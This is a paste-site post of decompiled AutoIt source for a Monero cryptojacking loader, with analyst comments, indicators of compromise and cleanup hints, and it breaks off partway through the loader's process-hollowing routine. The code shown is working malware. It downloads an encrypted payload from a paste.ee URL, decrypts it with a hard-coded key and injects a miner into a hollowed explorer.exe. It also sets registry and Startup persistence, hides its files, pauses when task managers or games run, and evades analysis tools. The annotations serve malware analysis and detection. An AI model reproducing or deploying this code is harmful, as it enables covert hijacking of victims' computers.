KekSec

XMR (Monero) mining malware source code — a decompiled AutoIt loader that my PC was infected with (see the myAut2Exe banner at the end of the listing)

Aug 2nd, 2020
; AutoIt3Wrapper compiler directives. The compiled binary shows no tray icon,
; is compressed at level 4 and UPX-packed — the packing also hides the plain
; strings below (pool, wallet, URL, mutex names) from a naive strings scan.
#NoTrayIcon
#Region
#AutoIt3Wrapper_Compression=4
#AutoIt3Wrapper_UseUpx=y
#EndRegion
; _3: read the Win32 GetLastError() code.
; Returns the OS error code as the function value and re-sets @error/@extended
; to the values passed in (defaults: the current @error/@extended), so a caller
; can keep AutoIt's own status while capturing the OS one. Looks like the stock
; _WinAPI_GetLastError() UDF after decompilation.
FUNC _3(CONST $0=@ERROR,CONST $1=@EXTENDED)
LOCAL $2=DLLCALL("kernel32.dll","dword","GetLastError")
RETURN SETERROR($0,$1,$2[0])
ENDFUNC
; Struct layout strings for DllStructCreate. The decompiler lost the names; the
; field lists match well-known Win32 structures:
;   $3 - RECT
;   $4 - REBARBANDINFO. Not referenced anywhere else in this listing. The
;        decompiler also dropped the ternary operators in the @OSVERSION test;
;        read the tail as  (@OSVERSION="WIN_XP") ? "" : ";"&$3&";uint uChevronState"
;   $5 - SECURITY_ATTRIBUTES (used by _66 when building the mutex)
;   $6 - OSVERSIONINFOW (used by _1V)
; $7 caches the packed OS version from _1V(); nothing in this listing reads it.
GLOBAL CONST $3="struct;long Left;long Top;long Right;long Bottom;endstruct"
GLOBAL CONST $4="uint cbSize;uint fMask;uint fStyle;dword clrFore;dword clrBack;ptr lpText;uint cch;"&"int iImage;hwnd hwndChild;uint cxMinChild;uint cyMinChild;uint cx;handle hbmBack;uint wID;uint cyChild;uint cyMaxChild;"&"uint cyIntegral;uint cxIdeal;lparam lParam;uint cxHeader"&((@OSVERSION="WIN_XP")""";"&$3&";uint uChevronState")
GLOBAL CONST $5="dword Length;ptr Descriptor;bool InheritHandle"
GLOBAL CONST $6="struct;dword OSVersionInfoSize;dword MajorVersion;dword MinorVersion;dword BuildNumber;dword PlatformId;wchar CSDVersion[128];endstruct"
GLOBAL CONST $7=_1V()
; _1V: call GetVersionExW and pack the result as (MajorVersion << 8) | MinorVersion
; (BitShift with a negative count is a left shift in AutoIt).
; Returns 0 with @error/@extended set if the call fails. Called once, for $7.
FUNC _1V()
LOCAL $8=DLLSTRUCTCREATE($6)
DLLSTRUCTSETDATA($8,1,DLLSTRUCTGETSIZE($8))
LOCAL $9=DLLCALL("kernel32.dll","bool","GetVersionExW","struct*",$8)
IF @ERROR OR NOT $9[0]THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
RETURN BITOR(BITSHIFT(DLLSTRUCTGETDATA($8,2),-8),DLLSTRUCTGETDATA($8,3))
ENDFUNC
; _53: download helper.
;   $A  URL
;   $B  when Default or true (the default) the binary body is converted to a string
; InetRead($A, 1): option 1 forces a fresh fetch (no local cache). @error/@extended
; from InetRead are propagated. Used once below to pull the encrypted payload from
; paste.ee — the paste URL is the network IOC for this sample.
FUNC _53($A,$B=TRUE )
LOCAL $C=INETREAD($A,1)
LOCAL $D=@ERROR,$E=@EXTENDED
IF $B=DEFAULT OR $B THEN $C=BINARYTOSTRING($C)
RETURN SETERROR($D,$E,$C)
ENDFUNC
; $F = -268435456 = 0xF0000000 = CRYPT_VERIFYCONTEXT (CSP opened without a
; persistent key container).
; $G is the CryptoAPI state shared by _5A.._5S:
;   [0] startup reference count, [1] Advapi32.dll handle from DllOpen,
;   [2] CSP handle from CryptAcquireContext.
GLOBAL CONST $F=-268435456
GLOBAL $G[3]
; _5A: reference-counted CryptoAPI startup (same shape as _Crypt_Startup in the
; stock Crypt.au3). On the first call it opens Advapi32.dll and acquires a CSP
; with provider type 24 (PROV_RSA_AES) and flags $F (CRYPT_VERIFYCONTEXT).
; Returns True on success. On failure returns False with @error = 1001 (DllOpen)
; or 1002 + DllCall @error, and @extended = GetLastError() when the API itself
; returned FALSE. Every successful call bumps the count; pair with _5B.
FUNC _5A()
IF _5L()=0 THEN
LOCAL $H=DLLOPEN("Advapi32.dll")
IF $H=-1 THEN RETURN SETERROR(1001,0,FALSE )
_5P($H)
LOCAL $I=24
LOCAL $9=DLLCALL(_5O(),"bool","CryptAcquireContext","handle*",0,"ptr",0,"ptr",0,"dword",$I,"dword",$F)
IF @ERROR OR NOT $9[0]THEN
LOCAL $D=@ERROR+1002,$E=@EXTENDED
IF NOT $9[0]THEN $E=_3()
DLLCLOSE(_5O())
RETURN SETERROR($D,$E,FALSE )
ELSE
_5R($9[1])
ENDIF
ENDIF
_5M()
RETURN TRUE
ENDFUNC
; _5B: CryptoAPI shutdown. Decrements the reference count; when it reaches zero
; the CSP handle is released (CryptReleaseContext) and Advapi32.dll is closed.
FUNC _5B()
_5N()
IF _5L()=0 THEN
DLLCALL(_5O(),"bool","CryptReleaseContext","handle",_5Q(),"dword",0)
DLLCLOSE(_5O())
ENDIF
ENDFUNC
; _5C: derive a session key from a password (the _Crypt_DeriveKey pattern).
;   $J  password bytes to hash (here the literal "ix32")
;   $K  ALG_ID of the key to derive (caller passes 26128 = 0x6610 = CALG_AES_256)
;   $L  hash ALG_ID, default 32771 = 0x8003 = CALG_MD5
; Steps: CryptCreateHash($L) -> CryptHashData($J) -> CryptDeriveKey($K, hash,
; flags 1 = CRYPT_EXPORTABLE). Returns the key handle, or -1 with @error 10+ /
; 20+ / 30+ identifying the failing step and @extended = GetLastError().
; The hash object is always destroyed; the CSP reference taken by _5A here is
; released later by _5D, not in this function.
; Security note: the key is fully determined by a hard-coded password through
; unsalted MD5, so anyone holding this script can decrypt the same payload.
FUNC _5C($J,$K,$L=32771)
LOCAL $9=0,$M=0,$N=0,$D=0,$E=0,$O=0
_5A()
IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
DO
$9=DLLCALL(_5O(),"bool","CryptCreateHash","handle",_5Q(),"uint",$L,"ptr",0,"dword",0,"handle*",0)
IF @ERROR OR NOT $9[0]THEN
$D=@ERROR+10
$E=@EXTENDED
IF NOT $9[0]THEN $E=_3()
$O=-1
EXITLOOP
ENDIF
; $9[5] = the out "handle*" parameter: the new hash object
$N=$9[5]
$M=DLLSTRUCTCREATE("byte["&BINARYLEN($J)&"]")
DLLSTRUCTSETDATA($M,1,$J)
$9=DLLCALL(_5O(),"bool","CryptHashData","handle",$N,"struct*",$M,"dword",DLLSTRUCTGETSIZE($M),"dword",1)
IF @ERROR OR NOT $9[0]THEN
$D=@ERROR+20
$E=@EXTENDED
IF NOT $9[0]THEN $E=_3()
$O=-1
EXITLOOP
ENDIF
$9=DLLCALL(_5O(),"bool","CryptDeriveKey","handle",_5Q(),"uint",$K,"handle",$N,"dword",1,"handle*",0)
IF @ERROR OR NOT $9[0]THEN
$D=@ERROR+30
$E=@EXTENDED
IF NOT $9[0]THEN $E=_3()
$O=-1
EXITLOOP
ENDIF
; $9[5] = the derived key handle
$O=$9[5]
UNTIL TRUE
IF $N<>0 THEN DLLCALL(_5O(),"bool","CryptDestroyHash","handle",$N)
RETURN SETERROR($D,$E,$O)
ENDFUNC
; _5D: destroy a key handle ($P) obtained from _5C and drop the matching
; CryptoAPI reference (_5B). Returns True, or False with @error = DllCall error
; + 10 and @extended = GetLastError() when CryptDestroyKey returned FALSE.
FUNC _5D($P)
LOCAL $9=DLLCALL(_5O(),"bool","CryptDestroyKey","handle",$P)
LOCAL $D=@ERROR,$E=@EXTENDED
IF NOT $9[0]THEN $E=_3()
_5B()
IF $D OR NOT $9[0]THEN
RETURN SETERROR($D+10,$E,FALSE )
ELSE
RETURN TRUE
ENDIF
ENDFUNC
; _5F: decrypt $Q with CryptoAPI (the _Crypt_DecryptData pattern).
;   $Q  ciphertext (binary)
;   $R  a key handle when $K = 0, otherwise a password that _5C turns into a key
;   $K  ALG_ID of the cipher; the caller passes 26128 (0x6610, CALG_AES_256)
;   $S  bFinal for CryptDecrypt (True = last block, padding stripped)
; The SWITCH on entry handles 26625 (0x6801, CALG_RC4): for an existing key
; handle ($K = 0) _5S reads its algorithm, and for RC4 an empty input is returned
; as an empty binary without touching the CSP.
; Decryption is done in place in a buffer of len+1000 bytes; the result is
; trimmed to the byte count CryptDecrypt reports ($9[6], the dword* length).
; Returns -1 with @error on failure (70 + DllCall error for CryptDecrypt) and
; always releases the derived key (_5D) and the CSP reference (_5B).
; In this sample the output is the miner PE image that _6G later injects.
FUNC _5F($Q,$R,$K,$S=TRUE )
SWITCH $K
CASE 0
LOCAL $T=_5S($R)
IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
IF $T=26625 THEN CONTINUECASE
CASE 26625
IF BINARYLEN($Q)=0 THEN RETURN SETERROR(0,0,BINARY(""))
ENDSWITCH
LOCAL $9=0,$M=0,$U=0,$D=0,$E=0,$V=0,$O=0
_5A()
IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
DO
IF $K<>0 THEN
; $R is a password: derive the key (MD5 of password -> CryptDeriveKey)
$R=_5C($R,$K)
IF @ERROR THEN
$D=@ERROR
$E=@EXTENDED
$O=-1
EXITLOOP
ENDIF
ENDIF
$M=DLLSTRUCTCREATE("byte["&BINARYLEN($Q)+1000&"]")
IF BINARYLEN($Q)>0 THEN DLLSTRUCTSETDATA($M,1,$Q)
$9=DLLCALL(_5O(),"bool","CryptDecrypt","handle",$R,"handle",0,"bool",$S,"dword",0,"struct*",$M,"dword*",BINARYLEN($Q))
IF @ERROR OR NOT $9[0]THEN
$D=@ERROR+70
$E=@EXTENDED
IF NOT $9[0]THEN $E=_3()
$O=-1
EXITLOOP
ENDIF
; $9[6] = plaintext length written back through the dword* parameter
$V=$9[6]
$U=DLLSTRUCTCREATE("byte["&$V+1&"]",DLLSTRUCTGETPTR($M))
$O=BINARYMID(DLLSTRUCTGETDATA($U,1),1,$V)
UNTIL TRUE
IF $K<>0 THEN _5D($R)
_5B()
RETURN SETERROR($D,$E,$O)
ENDFUNC
; _5L: current CryptoAPI startup reference count ($G[0]).
FUNC _5L()
RETURN $G[0]
ENDFUNC
; _5M: increment the CryptoAPI startup reference count.
FUNC _5M()
$G[0]+=1
ENDFUNC
; _5N: decrement the CryptoAPI startup reference count, never below zero.
FUNC _5N()
IF $G[0]>0 THEN $G[0]-=1
ENDFUNC
; _5O: the Advapi32.dll handle opened by _5A ($G[1]).
FUNC _5O()
RETURN $G[1]
ENDFUNC
; _5P: store the Advapi32.dll handle ($H) in $G[1].
FUNC _5P($H)
$G[1]=$H
ENDFUNC
; _5Q: the CSP (provider) handle acquired by _5A ($G[2]).
FUNC _5Q()
RETURN $G[2]
ENDFUNC
; _5R: store the CSP handle ($W) in $G[2].
FUNC _5R($W)
$G[2]=$W
ENDFUNC
; _5S: read the ALG_ID of an existing key handle $R via CryptGetKeyParam with
; dwParam 7 (KP_ALGID). Returns the ALG_ID, or 1 with @error = DllCall error + 80
; and @extended = GetLastError() on failure.
FUNC _5S($R)
LOCAL $X=DLLSTRUCTCREATE("uint")
LOCAL $9=DLLCALL(_5O(),"bool","CryptGetKeyParam","handle",$R,"dword",7,"struct*",$X,"dword*",DLLSTRUCTGETSIZE($X),"dword",0)
LOCAL $D=@ERROR,$E=@EXTENDED
IF NOT $9[0]THEN $E=_3()
IF $D OR NOT $9[0]THEN
RETURN SETERROR($D+80,$E,1)
ELSE
RETURN DLLSTRUCTGETDATA($X,1)
ENDIF
ENDFUNC
; _5U: milliseconds since the last user input, from GetLastInputInfo()
; (LASTINPUTINFO = {cbSize; dwTime}) and GetTickCount(). Returns 0 with @error
; set when the first API fails; if the tick count has wrapped (negative delta)
; it returns the raw tick count with @extended = 1.
; NOTE(review): the check after GetTickCount tests $2[0] (the GetLastInputInfo
; result) instead of $0Z, so a GetTickCount failure is never detected.
; _6F uses this value to switch to the full-CPU profile once the user has been
; idle for more than 50 s — a user-presence check, not an anti-sandbox one.
FUNC _5U()
LOCAL $Y=DLLSTRUCTCREATE("uint;dword")
DLLSTRUCTSETDATA($Y,1,DLLSTRUCTGETSIZE($Y))
LOCAL $2=DLLCALL("user32.dll","bool","GetLastInputInfo","struct*",$Y)
IF @ERROR OR $2[0]=0 THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
LOCAL $0Z=DLLCALL("kernel32.dll","dword","GetTickCount")
IF @ERROR OR NOT $2[0]THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
LOCAL $10=$0Z[0]-DLLSTRUCTGETDATA($Y,2)
IF $10<0 THEN RETURN SETEXTENDED(1,$0Z[0])
RETURN $10
ENDFUNC
; _66: named-mutex singleton check (the _Singleton UDF pattern).
;   $11  mutex name (this sample uses "ixhost" and "ixkiller")
;   $12  flags: bit 0 (1) - return instead of exiting when the mutex already
;        exists; bit 1 (2) - build SECURITY_ATTRIBUTES ($5) with a NULL DACL
;        (InitializeSecurityDescriptor revision 1 + SetSecurityDescriptorDacl),
;        i.e. a mutex any user/session can open.
; CreateMutexW(sa, bInitialOwner=1, name); if GetLastError() == 183
; (ERROR_ALREADY_EXISTS): with bit 0 set the handle is closed and 0 is returned
; with @error = @extended = 183, otherwise the script exits with code -1.
; On success returns the mutex handle, which callers here never close, so the
; mutex lives for the process lifetime. The names are a usable host IOC.
FUNC _66($11,$12=0)
LOCAL CONST $13=183
LOCAL CONST $14=1
LOCAL $15=0
IF BITAND($12,2)THEN
LOCAL $16=DLLSTRUCTCREATE("byte;byte;word;ptr[4]")
LOCAL $9=DLLCALL("advapi32.dll","bool","InitializeSecurityDescriptor","struct*",$16,"dword",$14)
IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
IF $9[0]THEN
; bDaclPresent=1, pDacl=NULL: everyone gets full access to the mutex
$9=DLLCALL("advapi32.dll","bool","SetSecurityDescriptorDacl","struct*",$16,"bool",1,"ptr",0,"bool",0)
IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
IF $9[0]THEN
$15=DLLSTRUCTCREATE($5)
DLLSTRUCTSETDATA($15,1,DLLSTRUCTGETSIZE($15))
DLLSTRUCTSETDATA($15,2,DLLSTRUCTGETPTR($16))
DLLSTRUCTSETDATA($15,3,0)
ENDIF
ENDIF
ENDIF
LOCAL $17=DLLCALL("kernel32.dll","handle","CreateMutexW","struct*",$15,"bool",1,"wstr",$11)
IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
LOCAL $18=DLLCALL("kernel32.dll","dword","GetLastError")
IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
IF $18[0]=$13 THEN
IF BITAND($12,1)THEN
DLLCALL("kernel32.dll","bool","CloseHandle","handle",$17[0])
IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
RETURN SETERROR($18[0],$18[0],0)
ELSE
EXIT -1
ENDIF
ENDIF
RETURN $17[0]
ENDFUNC
; ---- Entry point ---------------------------------------------------------------
; What the lines below do, in order:
;  * create the "ixhost" mutex. With flag 1 the result is returned, not acted on,
;    and it is discarded here — so this does NOT stop a second copy from running.
;  * $19 "UpdateScheduler": Run-key value name used for persistence (_6D).
;  * $1A: host process that gets hollowed by _6G — @WindowsDir\explorer.exe on
;    x86, @SystemDir\explorer.exe otherwise. $1B (svchost path) is never used.
;  * $1C/$1D: Monero pool pool.supportxmr.com:3333 and the attacker's wallet.
;  * $1E/$1F: miner command lines. $1E = "low" profile (-t 1, one thread),
;    $1F = "high" profile (--max-cpu-usage=100); both pass -p x, -k and --nicehash.
;    These look like xmrig switches (presumed from the flags; the miner binary
;    itself is downloaded, not in this listing).
;  * "ixkiller" mutex: if it already exists, a process with this script's name is
;    closed — effectively a kill switch that another tool can trigger.
;  * $1G = blob downloaded from https://paste.ee/r/LG8VC/0 (forced refresh).
;    $1H = that blob decrypted with AES-256 under an MD5-derived key from the
;    literal "ix32" — the PE image handed to _6G. $1I = current mining profile
;    ("" / "low" / "high").
;  * _6E(1000): a 1 s sleep whose tick-delta result is thrown away.
;  * main loop: GUIGetMsg() as a yield, then _6F (start/throttle the miner),
;    _6D (persistence), _6C (analysis-tool check, exits the script). Runs forever.
; IOCs: the paste.ee URL, the pool host, the wallet string, mutexes "ixhost" and
; "ixkiller", Run value "UpdateScheduler", and the file/registry paths in _6D.
_66("ixhost",1)
$19="UpdateScheduler"
GLOBAL $1A
IF @OSARCH="X86" THEN
$1A=@WINDOWSDIR&"\explorer.exe"
ELSE
$1A=@SYSTEMDIR&"\explorer.exe"
ENDIF
$1B="C:\Windows\System32\svchost.exe"
$1C="pool.supportxmr.com:3333"
$1D="42yzCwXHqAr2cbZ6kWU8SZJCq5H3quBAkgDd6ZZGKvvRYaPxKJ8J6GMVhGjo8pmgy74NRTvVst2ZGAk35ERgAS88NFHQQAV"
$1E="-o "&$1C&" -u "&$1D&" -p x -k -t 1 --nicehash"
$1F="-o "&$1C&" -u "&$1D&" -p x -k --max-cpu-usage=100 --nicehash"
IF _66("ixkiller",1)=0 THEN
IF PROCESSEXISTS(@SCRIPTNAME)THEN
PROCESSCLOSE(@SCRIPTNAME)
ENDIF
ENDIF
$1G=_53("https://paste.ee/r/LG8VC/0")
$1H=_5F($1G,"ix32",26128)
$1I=""
_6E(1000)
WHILE 1
GUIGETMSG()
_6F()
_6D($19)
_6C()
WEND
; _6C: anti-analysis check, run every loop iteration. Exits the script when the
; Sandboxie control process (SbieCtrl.exe) is running, or when WinGetText finds
; text for a window matching "Sanboxie Control" (sic), "PEiD", "ollydbg",
; "exetoaut" / "myAutToExe" (AutoIt decompilers) or "Program Manager".
; NOTE(review): "Program Manager" is the desktop shell window present on every
; normal Windows session; whether this entry fires depends on WinGetText's
; title-matching mode and on that window having text, which this listing does
; not show — treat it as an odd/possibly broken entry rather than a real check.
FUNC _6C()
IF PROCESSEXISTS("SbieCtrl.exe")OR WINGETTEXT("Sanboxie Control")OR WINGETTEXT("PEiD")OR WINGETTEXT("ollydbg")OR WINGETTEXT("exetoaut")OR WINGETTEXT("myAutToExe")OR WINGETTEXT("Program Manager")THEN
EXIT
ENDIF
ENDFUNC
; _6D($19): persistence, run every loop iteration. $19 = Run value name
; ("UpdateScheduler").
; Elevated (IsAdmin): copy self to @WindowsDir\<scriptname> and register that
; path under HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
; Non-elevated: copy self to the user's Startup folder AND to @DocumentsCommonDir,
; register under HKCU\...\Run (written twice with the same value name, so the
; surviving entry points at the @DocumentsCommonDir copy), mark both copies
; hidden+system (+SH), then set HKCU64 Policies\Explorer\NoFolderOptions = 1 and
; Explorer\Advanced\ShowSuperHidden = 0 so the user cannot easily reveal them.
; Each write is guarded by FileExists / RegRead = "" so it runs once.
; Cleanup for responders: delete the copies, remove the Run value under the
; matching hive, and restore the two Explorer values.
FUNC _6D($19)
IF ISADMIN()=1 THEN
IF FILEEXISTS(@WINDOWSDIR&"\"&@SCRIPTNAME)=FALSE THEN
FILECOPY(@SCRIPTFULLPATH,@WINDOWSDIR&"\"&@SCRIPTNAME)
ENDIF
IF REGREAD("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",$19)="" THEN
REGWRITE("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",$19,"REG_SZ",@WINDOWSDIR&"\"&@SCRIPTNAME)
ENDIF
ELSE
IF FILEEXISTS(@STARTUPDIR&"\"&@SCRIPTNAME)=FALSE THEN
FILECOPY(@SCRIPTFULLPATH,@STARTUPDIR&"\"&@SCRIPTNAME)
FILECOPY(@SCRIPTFULLPATH,@DOCUMENTSCOMMONDIR&"\"&@SCRIPTNAME)
ENDIF
IF REGREAD("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",$19)="" THEN
; second RegWrite overwrites the first: the Run value ends up as the common-documents path
REGWRITE("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",$19,"REG_SZ",@STARTUPDIR&"\"&@SCRIPTNAME)
REGWRITE("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",$19,"REG_SZ",@DOCUMENTSCOMMONDIR&"\"&@SCRIPTNAME)
FILESETATTRIB(@STARTUPDIR&"\"&@SCRIPTNAME,"+SH")
FILESETATTRIB(@DOCUMENTSCOMMONDIR&"\"&@SCRIPTNAME,"+SH")
REGWRITE("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoFolderOptions","REG_DWORD",1)
REGWRITE("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","ShowSuperHidden","REG_DWORD",0)
ENDIF
ENDIF
ENDFUNC
; _6E($1J): Sleep($1J) bracketed by two GetTickCount() reads. Returns False only
; when the measured elapsed time is exactly $1J ms, True otherwise. The only
; caller, _6E(1000) at startup, discards the result, so whatever sleep-skipping
; check this was meant to be has no effect in this sample.
FUNC _6E($1J)
LOCAL $1K=DLLCALL("kernel32.dll","dword","GetTickCount")
SLEEP($1J)
LOCAL $1L=DLLCALL("kernel32.dll","dword","GetTickCount")
IF $1L[0]-$1K[0]=$1J THEN
RETURN FALSE
ELSE
RETURN TRUE
ENDIF
ENDFUNC
; _6F: mining controller, called every loop iteration. $1M = idle time in ms
; (from _5U); $1I (global) = current profile "" / "low" / "high"; $1H = miner
; image; $1E / $1F = low / high command lines; $1A = host executable.
; 1) If a task/process monitor (Taskmgr, procexp, procexp64, procmon) or any of a
;    long list of games (Fortnite, Battlefield, Overwatch, CS:GO, Dota 2, GTA5,
;    PUBG "TslGame", ...) is running, or a window matching "FIFA" exists:
;    WinKill($1A) and pause 10 ms — hide the CPU load while someone might look.
;    NOTE(review): WinKill gets the host-exe PATH as a window title, and _6G
;    starts the host SW_HIDE, so whether this actually stops the miner cannot be
;    confirmed from this listing.
; 2) Else if idle > 50 s and neither madHcCtrl.exe nor Sling.exe is running:
;    start or switch to the "high" profile ($1F). If one of those is running and
;    the profile is "high", drop to "low" ($1E).
; 3) Else (user active): start or switch to the "low" profile; if no window
;    matching $1A exists at all, (re)start the low profile.
; Each start goes through _6G($1H, cmdline, $1A) — hollow a new explorer.exe
; with the decrypted miner — followed by a 3-5 s sleep.
FUNC _6F()
$1M=_5U()
IF PROCESSEXISTS("Taskmgr.exe")OR PROCESSEXISTS("procexp.exe")OR PROCESSEXISTS("procexp64.exe")OR PROCESSEXISTS("procmon.exe")OR PROCESSEXISTS("FortniteClient-Win64-Shipping.exe")OR PROCESSEXISTS("bf1.exe")OR PROCESSEXISTS("bf4.exe")OR PROCESSEXISTS("bf4_x86.exe")OR PROCESSEXISTS("NFS16.exe")OR PROCESSEXISTS("NFS16_trial.exe")OR PROCESSEXISTS("Overwatch.exe")OR PROCESSEXISTS("csgo.exe")OR PROCESSEXISTS("argo.exe")OR PROCESSEXISTS("dota2.exe")OR PROCESSEXISTS("rust.exe")OR PROCESSEXISTS("argo_x64.exe")OR PROCESSEXISTS("arma3.exe")OR PROCESSEXISTS("arma3_x64.exe")OR PROCESSEXISTS("Creativerse.exe")OR PROCESSEXISTS("hl2.exe")OR PROCESSEXISTS("GTA5.exe")OR PROCESSEXISTS("insurgency.exe")OR PROCESSEXISTS("insurgency_64.exe")OR PROCESSEXISTS("paladins.exe")OR PROCESSEXISTS("TslGame.exe")OR PROCESSEXISTS("Unturned.exe")OR WINEXISTS("FIFA")THEN
WINKILL($1A)
SLEEP(10)
ELSE
IF $1M>50000 THEN
; user idle: go to full CPU unless a media/streaming process is present
IF NOT PROCESSEXISTS("madHcCtrl.exe")AND NOT PROCESSEXISTS("Sling.exe")THEN
IF $1I="low" THEN
WINKILL($1A)
_6G($1H,$1F,$1A)
SLEEP(5000)
$1I="high"
ELSEIF $1I="" THEN
_6G($1H,$1F,$1A)
SLEEP(5000)
$1I="high"
ENDIF
ELSEIF $1I="high" THEN
_6G($1H,$1E,$1A)
SLEEP(5000)
$1I="low"
ELSEIF $1I="" THEN
_6G($1H,$1E,$1A)
SLEEP(5000)
$1I="low"
ENDIF
ELSEIF $1I="high" THEN
; user came back: drop to the one-thread profile
WINKILL($1A)
_6G($1H,$1E,$1A)
SLEEP(5000)
$1I="low"
ELSEIF $1I="" THEN
_6G($1H,$1E,$1A)
SLEEP(5000)
$1I="low"
ELSEIF NOT WINEXISTS($1A)THEN
_6G($1H,$1E,$1A)
SLEEP(3000)
ENDIF
ENDIF
ENDFUNC
; _6G($1N, $1O=0, $1P=0): process-hollowing ("RunPE") loader.
;   $1N  PE image to execute (binary; here the decrypted miner $1H)
;   $1O  command line, prefixed with the host path before CreateProcessW
;   $1P  host executable to spawn suspended and overwrite (explorer.exe path)
; Returns the new process id, or 0 with @error = failing step: 1 CreateProcess,
; 2 WOW64 target under 64-bit AutoIt, 3 GetThreadContext, 4 bad "MZ", 5 bad
; "PE\0\0" (17744 = 0x4550), 6 bitness mismatch / unknown optional-header magic,
; 7 WriteProcessMemory of the image, 8 / 9 PEB read / write, 10 SetThreadContext,
; 11 ResumeThread, 101 allocation in the host, 102 64-bit AutoIt on a non-x64
; OS. Every failure path TerminateProcess()es the suspended host first.
; Sequence: CreateProcessW(host, cmdline, flags 4 = CREATE_SUSPENDED, STARTUPINFO
; with STARTF_USESHOWWINDOW + SW_HIDE) -> GetThreadContext -> PEB address from
; Ebx (x86) / Rdx (x64) -> parse DOS / NT headers of $1N -> allocate SizeOfImage
; in the host (anywhere if the image has a relocation table, else at ImageBase,
; unmapping the host's own image with NtUnmapViewOfSection when needed) -> build
; the mapped image locally (headers + sections), apply relocations (_6I) ->
; WriteProcessMemory (name assembled by _6H to dodge string scans) -> patch
; PEB.ImageBaseAddress -> point Eax / Rcx at base + AddressOfEntryPoint ->
; SetThreadContext -> ResumeThread -> close handles.
; Detection notes: an AutoIt-compiled binary doing CreateProcess(CREATE_SUSPENDED)
; on explorer.exe followed by NtUnmapViewOfSection / VirtualAllocEx(PAGE_EXECUTE_
; READWRITE) / WriteProcessMemory / SetThreadContext / ResumeThread on that
; process is the canonical hollowing chain; afterwards the in-memory image of
; explorer.exe no longer matches the file on disk.
FUNC _6G($1N,$1O=0,$1P=0)
LOCAL $1Q=@AUTOITX64
LOCAL $1R=BINARY($1N)
LOCAL $1S=DLLSTRUCTCREATE("byte["&BINARYLEN($1R)&"]")
DLLSTRUCTSETDATA($1S,1,$1R)
LOCAL $1T=DLLSTRUCTGETPTR($1S)
; STARTUPINFOW: Flags = 1 (STARTF_USESHOWWINDOW), ShowWindow = SW_HIDE
LOCAL $1U=DLLSTRUCTCREATE("dword  cbSize;"&"ptr Reserved;"&"ptr Desktop;"&"ptr Title;"&"dword X;"&"dword Y;"&"dword XSize;"&"dword YSize;"&"dword XCountChars;"&"dword YCountChars;"&"dword FillAttribute;"&"dword Flags;"&"word ShowWindow;"&"word Reserved2;"&"ptr Reserved2;"&"ptr hStdInput;"&"ptr hStdOutput;"&"ptr hStdError")
DLLSTRUCTSETDATA($1U,"Flags",1)
DLLSTRUCTSETDATA($1U,"ShowWindow",@SW_HIDE)
LOCAL $1V=DLLSTRUCTCREATE("ptr Process;"&"ptr Thread;"&"dword ProcessId;"&"dword ThreadId")
IF $1O THEN $1O=$1P&" "&$1O
; dwCreationFlags 4 = CREATE_SUSPENDED: the host never runs its own code
LOCAL $1W=DLLCALL("kernel32.dll","bool","CreateProcessW","wstr",$1P,"wstr",$1O,"ptr",0,"ptr",0,"int",0,"dword",4,"ptr",0,"ptr",0,"ptr",DLLSTRUCTGETPTR($1U),"ptr",DLLSTRUCTGETPTR($1V))
IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
LOCAL $1X=DLLSTRUCTGETDATA($1V,"Process")
LOCAL $1Y=DLLSTRUCTGETDATA($1V,"Thread")
; 64-bit AutoIt cannot hollow a WOW64 (32-bit) host: abort
IF $1Q AND _6M($1X)THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(2,0,0)
ENDIF
LOCAL $1Z,$20
; $1Z selects the CONTEXT layout: 1 = x86, 2 = x64, 3 = WOW64 (never reached: that
; path terminates the host and returns 102)
IF $1Q THEN
IF @OSARCH="X64" THEN
$1Z=2
$20=DLLSTRUCTCREATE("align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;"&"dword ContextFlags; dword MxCsr;"&"word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;"&"uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;"&"uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;"&"uint64 Rip;"&"uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];"&"uint64 VectorRegister[52]; uint64 VectorControl;"&"uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip")
ELSE
$1Z=3
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(102,0,0)
ENDIF
ELSE
$1Z=1
